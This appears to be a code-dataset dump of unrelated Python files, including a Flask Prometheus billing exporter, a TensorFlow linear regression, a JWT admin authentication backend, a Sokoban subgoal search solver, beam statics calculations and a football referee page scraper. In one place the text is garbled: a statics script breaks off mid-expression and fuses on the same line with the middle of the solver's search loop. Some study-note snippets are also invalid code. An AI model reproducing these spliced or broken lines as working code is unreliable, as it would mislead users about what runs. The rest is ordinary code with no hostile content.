it\r\n    '''\r\n    return pd.concat([df,pd.get_dummies(df[colname])], axis=1)\r\n","repo_name":"haonen/CAPP30254","sub_path":"HW3/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44299667040","text":"import requests\nimport json\nimport sys\nimport os\nfrom flask import Flask\nfrom flask import jsonify\n\nprometheus_url = os.getenv('PROMETHEUS_URL', 'http://localhost:9090')\n\napp = Flask(__name__)\n\ndef doquery(query):\n    response = requests.get(prometheus_url + '/api/v1/query', params={'query': query})\n    content_json = json.loads(response.content)\n\n    if len(content_json['data']['result']) == 0:\n        content_json = 0\n\n    return content_json\n\ndef genflowJSON(flow, clientid,\n                processor_cpu_total, processor_memory_total, processor_plans,\n                flink_cpu_total, flink_memory_total, flink_plans,\n                collector_retentions, collector_plans, collector_bytes,\n                emitter_plans, emitter_bytes):\n    root = {}\n    collector = {}\n    processor = {}\n    flink = {}\n    emitter = {}\n\n    root['name'] = flow\n    root['clientid'] = clientid\n    root['collector'] = collector\n    root['emitter'] = emitter\n    root['processor'] = processor\n    root['flink'] = flink\n\n    collector['plans'] = collector_plans\n    collector['network_bytes'] = collector_bytes\n    collector['retentions'] = collector_retentions\n\n    processor['plans'] = processor_plans\n    processor['cpu'] = processor_cpu_total\n    processor['memory'] = processor_memory_total\n\n    flink['plans'] = flink_plans\n    flink['cpu'] = flink_cpu_total\n    flink['memory'] = flink_memory_total\n\n    emitter['plans'] = emitter_plans\n    emitter['network_bytes'] = emitter_bytes\n\n    jsonstr = json.dumps(root)\n    return jsonstr\n\ndef genflowsJSON(json_flows):\n    root = {}\n    flows = []\n\n    for flow in json_flows['data']['result']:\n        flows.append(flow['metric']['flow_namespace'])\n\n    root['flows'] = flows\n    jsonstr = json.dumps(root)\n    return jsonstr\n\n@app.route('/')\ndef root():\n    return \"Welcome 
to flowbillexporter!\"\n\n@app.route('/flow/')\ndef flows():\n q_flows = \"count by (flow_namespace)(count_over_time(flow_retention[1h]))\"\n data_flows = doquery(q_flows)\n jsonstr = genflowsJSON(data_flows)\n return jsonstr\n\n@app.route('/flow/')\ndef flow(flow):\n ### queries\n ## global\n # clientid\n q_clientid = \"flow_collector_input_limit{flow_namespace=\\\"%s\\\",rawValue!=''}[1h]\" % (flow)\n data_clientid = doquery(q_clientid)\n if data_clientid != 0:\n clientid = data_clientid['data']['result'][0]['metric']['clientId']\n else:\n return \"clientid not found\", 404\n\n ## collector\n # collector bytes\n q_collector_bytes = \"sum(increase(nginx_server_bytes{ns=\\\"%s\\\",host=~\\\".*collector.*\\\",direction=\\\"in\\\"}[1h]))\" % (flow)\n data_collector_bytes = doquery(q_collector_bytes)\n collector_bytes = 0\n\n if data_collector_bytes != 0:\n collector_bytes = data_collector_bytes['data']['result'][0]['value'][1]\n\n # collector retentions\n q_collector_retentions = \"sum by (rawValue)(count_over_time(flow_retention{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n data_collector_retentions = doquery(q_collector_retentions)\n\n collector_retentions = {}\n\n if data_collector_retentions != 0:\n for retention_plan in data_collector_retentions['data']['result']:\n collector_retentions.update({retention_plan['metric']['rawValue']: retention_plan['value'][1]})\n\n # collector plans #OK\n q_collector_plans = \"sum by (rawValue)(count_over_time(flow_collector_input_limit{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n data_collector_plans = doquery(q_collector_plans)\n collector_plans = {}\n for collector_plan in data_collector_plans['data']['result']:\n collector_plans.update({collector_plan['metric']['rawValue']: collector_plan['value'][1]})\n\n ## emitter\n # emitter network bytes\n q_emitter_network_bytes = \"sum(increase(nginx_server_bytes{ns=\\\"%s\\\",host=~\\\".*emiter.*\\\",direction=\\\"out\\\"}[1h]))\" % (flow)\n data_emitter_bytes = doquery(q_emitter_network_bytes)\n emitter_bytes = 0\n\n if data_emitter_bytes != 0:\n emitter_bytes = data_emitter_bytes['data']['result'][0]['value'][1]\n\n # emitter plans\n q_emitter_plans = \"sum by (rawValue)(count_over_time(flow_emitter_output_limit{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n data_emitter_plans = doquery(q_emitter_plans)\n emitter_plans = {}\n for emitter_plan in data_emitter_plans['data']['result']:\n emitter_plans.update({emitter_plan['metric']['rawValue']: emitter_plan['value'][1]})\n\n ## processor\n # processor cpu\n q_processor_cpu = \"sum(avg by (container_name)(rate(container_cpu_usage_seconds_total{namespace=\\\"%s\\\",container_name=~\\\"processor.*\\\"}[1h])))\" % (flow)\n data_processor_cpu = doquery(q_processor_cpu)\n processor_cpu_total = 0\n\n if data_processor_cpu != 0:\n processor_cpu_total = data_processor_cpu['data']['result'][0]['value'][1]\n\n # processor memory\n q_processor_memory = \"sum(avg_over_time(container_memory_usage_bytes{namespace=\\\"%s\\\",container_name=~\\\"processor.*\\\"}[1h] offset 1h)/1024/1024)\" % (flow)\n data_processor_memory = doquery(q_processor_memory)\n processor_memory_total = 0\n\n if data_processor_memory != 0:\n processor_memory_total = data_processor_memory['data']['result'][0]['value'][1]\n\n # processor plans\n processor_plans = {}\n processor_cpu_plans = {}\n processor_memory_plans = {}\n\n q_processor_cpu_plans = \"sum by (rawValue)(count_over_time(flow_processor_cpu_plan{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n q_processor_memory_plans = \"sum by 
(rawValue)(count_over_time(flow_processor_memory_plan{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n\n data_processor_cpu_plans = doquery(q_processor_cpu_plans)\n data_processor_memory_plans = doquery(q_processor_memory_plans)\n\n if data_processor_cpu_plans != 0 and data_processor_memory_plans != 0:\n for processor_cpu_plan in data_processor_cpu_plans['data']['result']:\n processor_cpu_plans.update({processor_cpu_plan['metric']['rawValue']: processor_cpu_plan['value'][1]})\n\n for processor_memory_plan in data_processor_memory_plans['data']['result']:\n processor_memory_plans.update({processor_memory_plan['metric']['rawValue']: processor_memory_plan['value'][1]})\n\n processor_plans['cpu'] = processor_cpu_plans\n processor_plans['memory'] = processor_memory_plans\n\n # flink cpu\n q_flink_cpu = \"sum(avg by (container_name)(rate(container_cpu_usage_seconds_total{namespace=\\\"%s\\\",container_name=~\\\"flink-taskmanager.*\\\"}[1h])))\" % (flow)\n data_flink_cpu = doquery(q_flink_cpu)\n flink_cpu_total = 0\n\n if data_flink_cpu != 0:\n flink_cpu_total = data_flink_cpu['data']['result'][0]['value'][1]\n\n # flink memory\n q_flink_memory = \"sum(avg_over_time(container_memory_usage_bytes{namespace=\\\"%s\\\",container_name=~\\\"flink-taskmanager.*\\\"}[1h] offset 1h)/1024/1024)\" % (flow)\n data_flink_memory = doquery(q_flink_memory)\n flink_memory_total = 0\n\n if data_flink_memory != 0:\n flink_memory_total = data_flink_memory['data']['result'][0]['value'][1]\n\n\t# flink plans\n flink_plans = {}\n flink_cpu_plans = {}\n flink_memory_plans = {}\n\n q_flink_cpu_plans = \"sum by (rawValue)(count_over_time(flow_flink_cpu_plan{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n q_flink_memory_plans = \"sum by (rawValue)(count_over_time(flow_flink_memory_plan{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n\n data_flink_cpu_plans = doquery(q_flink_cpu_plans)\n data_flink_memory_plans = doquery(q_flink_memory_plans)\n\n if data_flink_cpu_plans != 0 and data_flink_memory_plans != 0:\n for flink_cpu_plan in data_flink_cpu_plans['data']['result']:\n flink_cpu_plans.update({flink_cpu_plan['metric']['rawValue']: flink_cpu_plan['value'][1]})\n\n for flink_memory_plan in data_flink_memory_plans['data']['result']:\n flink_memory_plans.update({flink_memory_plan['metric']['rawValue']: flink_memory_plan['value'][1]})\n\n flink_plans['cpu'] = flink_cpu_plans\n flink_plans['memory'] = flink_memory_plans\n\n # build json\n jsonstr = genflowJSON(flow, clientid, \n processor_cpu_total, processor_memory_total, processor_plans,\n flink_cpu_total, flink_memory_total, flink_plans,\n collector_retentions, collector_plans, collector_bytes, \n emitter_plans, emitter_bytes)\n\n return jsonstr\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","repo_name":"oktawave-code/horizon","sub_path":"flowbillexporter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5702898747","text":"def solution(lottos, win_nums):\n\n \n count = 0\n zeros = 0\n print(lottos)\n print(win_nums)\n for i in range(len(lottos)):\n num = lottos[i]\n if num == 0:\n zeros += 1\n for j in range(len(win_nums)):\n if num == win_nums[j]:\n count += 1\n\n answer = [count, count + zeros]\n answer[0] = 7 - (count+zeros) if (7-(count+zeros) < 7) else 6\n answer[1] = 7 - count if(7-count) < 7 else 6\n return 
answer","repo_name":"Kyuber1007/problemsolving","sub_path":"programmers/lottos.py","file_name":"lottos.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10838778649","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n\n# Loading the dataset\ndataset = np.loadtxt(\"data.txt\", delimiter=',')\nprint(dataset.shape)\n\n# Visualizing the data\nplt.scatter(dataset[:, 0], dataset[:, -1])\nplt.title(\"Data points\")\nplt.xlabel(\"Size\")\nplt.ylabel(\"Price\")\nplt.show()\n\n# Splitting it into training and testing sets\nX_train, X_test, Y_train, Y_test = train_test_split(dataset[:, :-1], dataset[:, -1], test_size=0.3, random_state=1)\nY_train = Y_train.reshape(Y_train.shape[0], 1)\nY_test = Y_test.reshape(Y_test.shape[0], 1)\n\n# Preprocessing the data.\n# Mean normalisation and feature scaling.\ndef preprocess(X, mean=None, std=None):\n m, n = X.shape\n if mean is None and std is None:\n mean = np.mean(X, axis=0)\n std = np.std(X, axis=0)\n\n X = (X - mean) / std\n return X, mean, std\n else:\n X = (X - mean) / std\n return X\n\nX_train, mean, std = preprocess(X_train)\nX_test = preprocess(X_test, mean, std)\n\n# Some useful values\nm, n = X_train.shape\nprint(\"Number of training examples:\", m)\nprint(\"Number of features:\", n)\n\n# TensorFlow Time!\n\n# Creating placeholders for the inputs\nX = tf.placeholder(tf.float32, [None, n], name='X')\nY = tf.placeholder(tf.float32, [None, 1], name='Y')\n\n# Creating variables to hold the parameters\nW = tf.Variable(tf.zeros([n, 1]))\nb = tf.Variable(tf.zeros([1]))\n\n# Defining h(x), cost, and the optimizer\nhypothesis = tf.add(tf.matmul(X, W), b, name='hypothesis')\ncost = tf.reduce_mean(tf.square(hypothesis - Y), name='MSE')\noptimizer = tf.train.GradientDescentOptimizer(0.01).minimize(cost)\n\ninit = tf.global_variables_initializer()\nepochs = 500\nhistory = []\ntest_history = []\n\nwith tf.Session() as sess:\n # Initializing all variables\n sess.run(init)\n # Training\n for epoch in range(epochs):\n dummy, c = sess.run([optimizer, cost], feed_dict={X: X_train, Y: Y_train})\n history.append(c)\n #For plotting costVsIterations for testing\n ctest = sess.run(cost, feed_dict={X: X_test, Y: Y_test})\n test_history.append(ctest)\n\n # Making predictions on the training and testing sets \n train_predictions = sess.run(hypothesis, feed_dict={X: X_train, Y: Y_train})\n test_predictions = sess.run(hypothesis, feed_dict={X: X_test, Y: Y_test})\n\n # Saving the model to disk\n # tf.saved_model.simple_save(sess, 'lin-model-dir', \n # inputs={\"X\": X},\n # outputs={\"hypothesis\": hypothesis})\n\nprint(\"First 5 predictions on the training set.\")\nprint(train_predictions[:5])\n\nprint(\"Final cost:\", history[-1])\n\nplt.plot(history,label=\"training\")\nplt.plot(test_history,label=\"testing\")\nplt.legend(loc='upper right')\nplt.xlabel(\"Iterations\")\nplt.ylabel(\"Cost\")\nplt.title(\"Cost over Iterations\")\nplt.show()\n\n# Plotting the predictions\nmin_max = [[X_train.min()], [X_train.max()]]\nmin_max_pred = train_predictions[[np.argmin(X_train), np.argmax(X_train)]]\nplt.plot(min_max, min_max_pred)\nplt.scatter(X_train[:, 0], Y_train, label='Training set')\nplt.scatter(X_test[:, 0], Y_test, marker='*', label='Testing set')\nplt.xlabel(\"Size\")\nplt.ylabel(\"Price\")\nplt.title(\"Predictions\")\nplt.legend()\nplt.show()\n\n# Loading the saved model\n# 
print(\"\\nAfter reloading the model:\")\n# with tf.Session(graph=tf.Graph()) as sess:\n# tf.saved_model.loader.load(sess, ['serve'], 'lin-model-dir')\n# graph = tf.get_default_graph()\n# train_predictions = sess.run('hypothesis:0', feed_dict={'X:0': X_train})\n\n# print(\"First 5 predictions on the training set.\")\n# print(train_predictions[:5])","repo_name":"syncerax/Linear-Regression-in-TensorFlow","sub_path":"tf_lin_reg.py","file_name":"tf_lin_reg.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29199825566","text":"from datetime import datetime, timedelta\nfrom typing import Any, Optional\n\nfrom esmerald import Request\nfrom esmerald.exceptions import AuthenticationError\nfrom esmerald.security.jwt.token import Token\nfrom jose import JWSError, JWTError\nfrom sqladmin.authentication import AuthenticationBackend\nfrom starlette.responses import RedirectResponse\n\nDEFAULT_HEADER = \"Bearer\"\n\n\nclass BackendBaseAuthentication(AuthenticationBackend):\n \"\"\"\n Uses the AuthenticationProtocol from esmerald_admin assuming it is using the\n Esmerald contrib user and login into the admin.\n \"\"\"\n\n def __init__(self, secret_key: str, auth_model: Any, config: Any) -> None:\n super().__init__(secret_key)\n self.auth_model = auth_model\n self.config = config\n\n def generate_user_token(self, user: Any, time: Any = None) -> str:\n \"\"\"\n Generates the JWT token for the authenticated user.\n \"\"\"\n if not time:\n later = datetime.now() + timedelta(minutes=20)\n else:\n later = time\n\n token = Token(sub=user.id, exp=later)\n return token.encode(key=self.config.signing_key, algorithm=self.config.algorithm)\n\n def is_user_able_to_authenticate(self, user: Any) -> bool:\n \"\"\"\n Reject users with is_active=False. 
Custom user models that don't have\n that attribute are allowed.\n \"\"\"\n return getattr(user, \"is_active\", True)\n\n def is_user_staff_and_superuser(self, user: Any) -> bool:\n \"\"\"Checks if a user is staff and superuser to acess the admin\"\"\"\n return bool(user.is_staff and user.is_superuser)\n\n async def clear_session(self, request: Request) -> None:\n \"\"\"Clears the login sessions form the browser\"\"\"\n request.session.clear()\n\n async def logout(self, request: Request) -> bool: # type: ignore\n \"\"\"Logout from the admin\"\"\"\n await self.clear_session(request)\n return True\n\n async def authenticate(self, request: Request) -> Optional[RedirectResponse]: # type: ignore\n \"\"\"Authenticates the user and adds to the scope of the application\"\"\"\n token = request.session.get(\"token\")\n\n if not token:\n return RedirectResponse(request.url_for(\"admin:login\"), status_code=302)\n\n token = f\"{DEFAULT_HEADER} {token}\"\n token_partition = token.partition(\" \")\n token_type = token_partition[0]\n auth_token = token_partition[-1]\n\n if not token_type:\n await self.clear_session(request)\n return RedirectResponse(request.url_for(\"admin:login\"), status_code=302)\n\n try:\n token = Token.decode(\n token=auth_token,\n key=self.config.signing_key,\n algorithms=[self.config.algorithm],\n )\n except (JWSError, JWTError):\n await self.clear_session(request)\n return RedirectResponse(request.url_for(\"admin:login\"), status_code=302)\n\n user = await self.retrieve_user(token.sub)\n if not user:\n await self.clear_session(request)\n raise AuthenticationError(\"User not found.\")\n","repo_name":"tarsil/esmerald-admin","sub_path":"esmerald_admin/backends/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1437276890","text":"L = [1,2,3,4,5]\n\nL[1] # indexing is O(1)\nL.find() # O(N)\nL.append(6) # O(1)\n# insert into list is O(N)\nL.pop() # deleting from end is O(1)\nL.pop(1) # delete from middle is O(N)\n\n# O(N) - O notation means worst case.\n# you can get lucky and return early,\n# it's still O(N)\ndef search(x):\n for i in range(len(L)):\n if L[i] == x:\n return i\n return -1\n\n\n# \"O(2N)\" -> O(N)\ndef foo(N):\n for i in range(N):\n print(i)\n for i in range(N):\n print(i)\n\nd = {} # empty dict\nd = {1:2, 2:76, 3:568, 4:123} # dict int:int\nd = {\"asd\":2, \"qwyeuyhiu\":76, \"qwe\":568, \"qweopi\":123} # dict string:int\ns = {1, 2, 3} # set with 1, 2, 3 in it\ns = set() # empty set\n\nd[key] # indexing into dict is O(1)\nkey in d # search for exact key match in dict is O(1)\nd[new_key] = new_value # adding to dict is O(1)\ndel d[key] # removing from dict is O(1)\n\n# Two sum\ndef twoSum(self, nums, target):\n d = {}\n N = len(nums)\n for i in range(N):\n n = nums[i]\n x = target - n\n if x in d:\n return [i, d[x]]\n d[n] = i\n return [-1, -1] \n\n# Two Sum, O(N^2)\nfor i in range(len(L)):\n for j in range(i+1, len(L)):\n if L[i] + L[j] == target:\n return [i,j]\n","repo_name":"henryliuser/hliu-cp","sub_path":"other/asdqweiuwh.py","file_name":"asdqweiuwh.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"7459447319","text":"codigo = (input(\"Por favor ingrese su codigo de estudiante: \"))\r\nx = 0\r\nfor numero in codigo:\r\n sumar = int(numero)\r\n x+=sumar\r\n# ya tengo el valor de mi x\r\n\r\nimport numpy as np\r\nimport sympy as 
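# Note: x above is the digit sum of the student code (e.g. codigo = "12345"
# gives x = 1+2+3+4+5 = 15), and every load and length parameter defined
# below (y, W_max, p, l1, l2, l3) is scaled from that x.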
sp\r\n\r\n# DATOS\r\ny = x/3\r\nW_max = 0.005*x + 0.01*(y) \r\np = 0.05*x\r\nl1 = 0.05*x\r\nl2 = 1.5*l1\r\nl3 = 0.5*l1\r\nangulo_p_Grados = 45 \r\nangulo_p_Rad = (45 * np.pi)/180\r\n\r\n# PUNTUALIZACION DE CARGAS\r\nP1 = (l1*W_max)/2\r\nP2 = l2*W_max\r\nP3 = (l3*W_max)/2\r\nPx = p*(sp.cos(angulo_p_Rad))\r\nPy = p*sp.sin(angulo_p_Rad)\r\n\r\n# ESTATICA\r\n# sumatoria de fuerzas en y \r\nAy = P1 + P2 + P3 - Py\r\n# sumatoria de fuerzas en X \r\nAx = -Px\r\n# sumatoria de momentos en C \r\nMa = Ay*(l1+l2) - P1*(l2+(l1/3)) - P2*(l2/2) + P3*(l3/3) - Py*l3 \r\n\r\n\r\n# FUERZAS INTERNAS\r\n\r\n# Tramo AB 0 < X <= l1\r\nfrom sympy.abc import X\r\nW_AB = (W_max*X)/l1 \r\nV_AB = -(sp.integrate(W_AB,X)) + Ay\r\nM_AB = Ma + sp.integrate(V_AB,X)\r\n\r\nV_AB_Ev = V_AB.subs ({X: l1})\r\nM_AB_Ev = M_AB.subs ({X: l1})\r\n\r\n# Tramo BC 0 < X <= l2\r\nW_BC = W_max\r\nV_BC = -(sp.integrate(W_BC,X)) + V_AB_Ev\r\nM_BC = (sp.integrate(V_BC,X)) + M_AB_Ev\r\n\r\nV_BC_Ev = V_BC.subs ({X: l2})\r\nM_BC_Ev = M_BC.subs ({X: l2})\r\n\r\n# Tramo CD 0 < X <= l3\r\nW_CD = (-W_max*X)/l3\r\nV_CD = -(sp.integrate(W_CD,X)) + V_BC_Ev\r\nM_CD = (sp.integrate(V_CD,X)) + M_BC_Ev\r\n\r\nV_CD_Ev = V_CD.subs ({X: l3})\r\nM_CD_Ev = M_CD.subs ({X: l3})\r\n\r\n# Gráfica de cortante\r\nimport matplotlib.pyplot as plt\r\n\r\ndef tramo1(X):\r\n return(V_AB)\r\ndef tramo2(X):\r\n return(V_BC)\r\ndef tramo3(X):\r\n return(V_CD)\r\na=0\r\nb=l1\r\nc=l2\r\nd=l3\r\n\r\nX=np.linspace(a,d,500)\r\ny = np.piecewise(X,[(a<=X) & (X= self.max_tree_size:\n finished_cause = 'Finished cause tree too big'\n break\n if solved:\n finished_cause = 'Finished cause solved'\n break\n\n if self.use_adaptive_iterations == 'best-first':\n top_values = []\n\n for queue in node_queues:\n if queue.empty():\n value = 1e9 # infinity; never chosen as smaller is better\n else:\n best_elem = queue.get()\n (value, _, _) = best_elem\n queue.put(best_elem)\n top_values.append(value)\n\n current_queue_id = np.argmin(top_values)\n elif self.use_adaptive_iterations == 'force-longest':\n for i, queue in enumerate(node_queues):\n if not queue.empty():\n current_queue_id = i\n break\n else:\n # if the iterations limit is reached, move to the next queue\n if current_iterations >= self.iterations_list[current_queue_id]:\n current_queue_id = (current_queue_id + 1) % len(node_queues)\n current_iterations = 0\n\n # if current queue is empty, move to the next one\n while node_queues[current_queue_id].empty():\n print(f'Queue nb {current_queue_id} is empty.')\n current_queue_id = (current_queue_id + 1) % len(node_queues)\n current_iterations = 0\n\n current_iterations += 1\n\n # pop node from queue to expand\n current_node = node_queues[current_queue_id].get()[-1]\n reverse_order = True # We want goals returned by goal builder to be sorted from most to least probable.\n if current_node.depth < self.max_tree_depth:\n if isinstance(self.goal_builders[current_queue_id], list):\n builders_to_expand = self.goal_builders[current_queue_id]\n else:\n builders_to_expand = [self.goal_builders[current_queue_id]]\n\n goals = []\n\n for builder_id, builder in enumerate(builders_to_expand):\n new_goals, verificator_certain_number, verificator_trash_number, verificator_to_be_verified_later_number, ver_calls, cllp_calls, ver_samples_in_calls, cllp_samples_in_calls, all_node_computations_in_graph, subgoal_gen_calls = builder.build_goals(\n current_node.state,\n self.max_steps_list[builder_id],\n self.total_confidence_level,\n self.internal_confidence_level,\n self.max_goals,\n reverse_order)\n\n goals 
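# Note on the queue discipline in this loop: every PriorityQueue holds
# (-value, random.random(), node) tuples (see where children are enqueued
# below), so the highest-value node sorts first, and the random tiebreaker
# keeps equal-value entries from falling through to comparing SolverNode
# objects. queue.PriorityQueue has no peek, hence the get()-then-put()
# pattern in the best-first branch above.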
+= new_goals\n\n total_verificator_certain_number += int(verificator_certain_number)\n total_verificator_trash_number += int(verificator_trash_number)\n total_verificator_to_be_verified_later_number += int(verificator_to_be_verified_later_number)\n total_ver_calls += ver_calls\n total_cllp_calls += cllp_calls\n total_ver_samples_in_calls += ver_samples_in_calls\n total_cllp_samples_in_calls += cllp_samples_in_calls\n total_nodes_with_computations_in_graph += all_node_computations_in_graph\n total_subgoal_gen_calls += subgoal_gen_calls\n\n if collect_data_for_graph_tracer:\n current_node.expanded = True\n\n all_goals_created += len(goals)\n expanded_nodes += 1\n created_new = 0\n\n for child_num, goal_proposition in enumerate(goals):\n current_goal_state = goal_proposition.goal_state\n current_goal_state_hashed = goal_proposition.hashed_goal\n path = goal_proposition.path\n\n if current_goal_state_hashed not in seen_hashed_states:\n created_new += 1\n seen_hashed_states.add(current_goal_state_hashed)\n new_node = SolverNode(current_goal_state, current_node, goal_proposition.p,\n current_node.depth + 1, child_num, path,\n goal_proposition.reachable_wrt_verificator,\n current_queue_id)\n\n current_node.add_child(new_node)\n tree_depth = max(tree_depth, new_node.depth)\n node_val = self.value_estimator.evaluate(new_node.state)\n new_node.set_value(node_val)\n for queue in node_queues:\n queue.put((-node_val, random.random(), new_node))\n tree_size += 1\n total_value_calls += 1\n\n\n # look for solution\n if self.solved(current_goal_state):\n solution.append(new_node)\n solved = True\n break\n\n else:\n if collect_data_for_graph_tracer:\n extra_edge_target = hashed_state_to_id[current_goal_state_hashed]\n tree_extra_edges.append(\n (current_node.id, extra_edge_target, readable_num(goal_proposition.p)))\n tree_metrics = {'nodes': tree_size,\n 'expanded_nodes': expanded_nodes,\n 'unexpanded_nodes': tree_size - expanded_nodes,\n 'max_depth': tree_depth,\n 'avg_n_goals': all_goals_created / expanded_nodes if expanded_nodes > 0 else 0,\n 'verificator_failed': 0, # To be filled during solution verification\n 'verificator_succeed': 0, # To be filled during solution verification\n 'verificator_certain_number': total_verificator_certain_number,\n 'verificator_trash_number': total_verificator_trash_number,\n 'verificator_verified_later_number': total_verificator_to_be_verified_later_number,\n 'verificator_first_fail_goal_index': -1, # To be filled during solution verification,\n 'ver_calls': total_ver_calls,\n 'ver_samples_in_calls': total_ver_samples_in_calls,\n 'cllp_calls': total_cllp_calls,\n 'cllp_samples_in_calls': total_cllp_samples_in_calls,\n 'total_nodes_with_computations_in_graph': total_nodes_with_computations_in_graph,\n 'value_calls': total_value_calls,\n 'subgoal_gen_calls': total_subgoal_gen_calls,\n }\n # print('Tree metrics', tree_metrics)\n\n additional_info = dict(\n finished_cause=finished_cause,\n tree_nodes=tree_nodes,\n tree_edges=tree_edges,\n tree_extra_edges=tree_extra_edges,\n # real_dist=np.array([np.sum(distances) if distances else 0 for distances in real_dist]),\n # real_called=real_called,\n generators_used=generators_used,\n )\n # for goal_builder in self.goal_builders:\n # goal_builder.dump_and_clear_data_for_verificator()\n if solved:\n node = solution[0]\n while node.parent is not None:\n solution.append(node.parent)\n node = node.parent\n\n if self.use_verificator_for_solving:\n print('Using verificator, so have to verify final trajectories',\n 
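# `solution` starts as [goal_node]; the parent walk above appends ancestors
# in goal-to-root order, which is why inter_goals is later built from
# reversed(solution) to recover the root-to-goal chain.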
self.use_verificator_for_solving)\n # Check if solution makes sense\n initial_state = solution[-1]\n idx = 0\n for goal_state in solution[-2::-1]: # We also skip root\n if goal_state.reachable_wrt_verificator:\n raw_reached, calls, samples, node_computations = \\\n self.goal_builders[goal_state.generator_id]._are_accessible_from_given_state_wrt_policy(\n [goal_state], initial_state.state, self.max_steps_in_solution_stage, True)\n tree_metrics['cllp_calls'] += calls\n tree_metrics['cllp_samples_in_calls'] += samples\n tree_metrics['total_nodes_with_computations_in_graph'] += node_computations\n reachable = raw_reached[0]\n if not reachable:\n # NOTE: Abort on failure. Better try to backup.\n tree_metrics['verificator_failed'] = 1\n tree_metrics['verificator_first_fail_goal_index'] = idx\n return (None, tree_metrics, root, None, additional_info)\n initial_state = goal_state # Update of old initial state\n idx += 1\n tree_metrics['verificator_succeed'] = 1\n\n trajectory_actions = []\n for i, inter_goal in enumerate(solution):\n # print('inter_goal.path', i, len(solution), f'generator_{inter_goal.generator_id}', inter_goal.path, inter_goal.reachable_wrt_verificator)\n trajectory_actions += list(inter_goal.path)\n if inter_goal.generator_id is not None:\n generators_used[inter_goal.generator_id] += 1\n\n inter_goals = [node for node in reversed(solution)]\n additional_info['generators_used'] = generators_used\n\n return (inter_goals, tree_metrics, root, trajectory_actions, additional_info)\n else:\n return (None, tree_metrics, root, None, additional_info)\n","repo_name":"TomaszOdrzygozdz/AdaSubS_colab","sub_path":"solvers/iterative_solver_sokoban.py","file_name":"iterative_solver_sokoban.py","file_ext":"py","file_size_in_byte":15485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21831355958","text":"import datetime\nimport sys\n\nSEARCH_MAX = 100\n\n# These search strings are assumed to appear at least once, and have identical\n# information no matter how many times they appear\nDORT_SEARCH_STR = ['03_lnkHakem', 'hakemId=']\nAR2_SEARCH_STR = ['02_lnkHakem', 'hakemId=']\nAR1_SEARCH_STR = ['01_lnkHakem', 'hakemId=']\nHAKEM_SEARCH_STR = ['00_lnkHakem', 'hakemId=']\nAWAY_TEAM_SEARCH_STR = ['Takim2\"', 'kulupId=']\nHOME_TEAM_SEARCH_STR = ['Takim1\"', 'kulupId=']\nSTAD_SEARCH_STR = ['lnkStad', 'stadId=']\n\ndef break_down_pattern_one(html_output_str, search_str, end_character):\n # Format: search_str[0] + blablablabla + search_str[1] + ID + \"> + NAME + <\n # 18486\">BAK TUNCAY AKKIN(1. Yardmc Hakem)<\n # This pattern is very common, break this apart as:\n # 'hakemId='', '18486', 'BAK TUNCAY AKKIN(1. 
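# Worked example, using the sample fragment quoted for find_hakem below:
# find_hakem('00_lnkHakem" href="Default.aspx?pageId=72&hakemId=19553">CUMHUR ALTAY(Hakem)<')
# returns (19553, 'CUMHUR ALTAY'): the id is read up to the closing quote,
# then the name up to the '(' end character.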
Yardmc Hakem)'\n\n # Find the first string index\n idx1 = html_output_str.find(search_str[0])\n if idx1 == -1:\n # If the search_str is not contained in the html file, return empty\n return [], ''\n else:\n # Find the second string index after the first one\n idx2 = html_output_str.find(search_str[1], idx1)\n # Reduce the html to a long substring the contains the information\n start_idx = idx2 + len(search_str[1])\n end_idx = idx2 + len(search_str[1]) + SEARCH_MAX\n long_string = html_output_str[start_idx:end_idx]\n\n # Now, find the information in this long substring\n count = 0\n id_str = ''\n name = ''\n while long_string[count] is not '\"':\n id_str = id_str + long_string[count]\n count = count+1\n # Next charachter is '\"', the second next must be '>'\n count = count + 1\n if long_string[count] is not '>':\n raise Exception('Something is wrong')\n # Start reading the stad name until '<'\n count = count + 1\n while long_string[count] is not end_character:\n name = name + long_string[count]\n count = count + 1\n # Cleanup extra spaces in the name\n name = ' '.join(name.split())\n return ([], '') if id_str=='' else (int(id_str), name)\n\ndef find_dort(html_output_str):\n # 03_lnkHakem\" href=\"Default.aspx?pageId=72&hakemId=19089\">TOLGA �ZKALFA(D�rd�nc� Hakem)<\n end_char = '('\n return break_down_pattern_one(html_output_str, DORT_SEARCH_STR, end_char)\n\ndef find_ar2(html_output_str):\n # 02_lnkHakem\" href=\"Default.aspx?pageId=72&hakemId=20658\">MUSTAFA HELVACIO�LU(2. Yard�mc� Hakem)<\n end_char = '('\n return break_down_pattern_one(html_output_str, AR2_SEARCH_STR, end_char)\n\ndef find_ar1(html_output_str):\n # 01_lnkHakem\" href=\"Default.aspx?pageId=72&hakemId=18549\">TOLGA KADAZ(1. Yard�mc� Hakem)<\n end_char = '('\n return break_down_pattern_one(html_output_str, AR1_SEARCH_STR, end_char)\n\ndef find_hakem(html_output_str):\n # 00_lnkHakem\" href=\"Default.aspx?pageId=72&hakemId=19553\">CUMHUR ALTAY(Hakem)<\n end_char = '('\n 